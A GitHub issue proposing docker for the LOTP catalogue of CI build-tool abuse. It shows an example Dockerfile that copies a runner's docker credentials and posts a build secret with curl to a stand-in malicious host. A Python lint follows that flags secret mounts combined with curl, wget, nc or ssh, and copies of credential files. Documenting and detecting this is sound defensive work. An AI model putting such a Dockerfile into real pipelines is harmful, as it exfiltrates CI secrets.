
[LOTP] Add docker

Open fproulx-boostsecurity opened this issue 7 months ago • 0 comments

Description of the LOTP tool

docker is a tool to build / inspect OCI images and run containers. The build stage can be configured with a Dockerfile.

Configuration files

Dockerfile

Exfiltration scenario

In the case where build-time secrets are exposed to docker build, a maliciously crafted Dockerfile could allow exfiltration of the secrets.

FROM ubuntu:latest

ADD /home/runner/.docker/config.json config.json
RUN ...

RUN --mount=type=secret,id=mysecret \
    sh -c 'curl -X POST -d "@/run/secrets/mysecret" http://malicious-server.example.com'

fproulx-boostsecurity, Jul 17 '24 17:07
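
A review-time lint for the scenario described in this issue, as an added example that is not part of the original issue or the LOTP project: it flags `RUN` steps that combine a secret mount with a network client, and `ADD`/`COPY` of credential files. The regex lists and rule names are assumptions of this example, and it goes slightly beyond the issue's Dockerfile by covering a few other common credential paths.

```python
import re

# Heuristic lists (assumptions of this example, not an exhaustive policy).
EGRESS = re.compile(r"\b(curl|wget|nc|ncat|scp|ssh)\b")
CRED_PATH = re.compile(r"(\.docker/config\.json|\.ssh/|\.aws/credentials|\.npmrc|\.netrc)")
SECRET_MOUNT = re.compile(r"--mount=\S*type=secret")

def instructions(text):
    """Yield (line_no, instruction) with backslash continuations joined."""
    buf, start = "", 0
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not buf and (not line or line.startswith("#")):
            continue
        if not buf:
            start = no
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        yield start, buf + line
        buf = ""
    if buf:
        yield start, buf.strip()

def audit(text):
    """Return a list of (line_no, rule, instruction) findings."""
    findings = []
    for no, ins in instructions(text):
        op, _, rest = ins.partition(" ")
        op = op.upper()
        if op == "RUN" and SECRET_MOUNT.search(rest) and EGRESS.search(rest):
            findings.append((no, "secret-mount-with-egress", ins))
        elif op in ("ADD", "COPY") and CRED_PATH.search(rest):
            findings.append((no, "credential-file-copied", ins))
    return findings

# Sample input: the Dockerfile quoted in the issue above.
SAMPLE = """FROM ubuntu:latest

ADD /home/runner/.docker/config.json config.json
RUN ...

RUN --mount=type=secret,id=mysecret \\
    sh -c 'curl -X POST -d "@/run/secrets/mysecret" http://malicious-server.example.com'
"""

if __name__ == "__main__":
    for no, rule, ins in audit(SAMPLE):
        print(f"line {no}: {rule}: {ins}")
```

Run against Dockerfiles changed in a pull request before any build job that exposes secrets; a finding is a prompt for human review, not proof of malice.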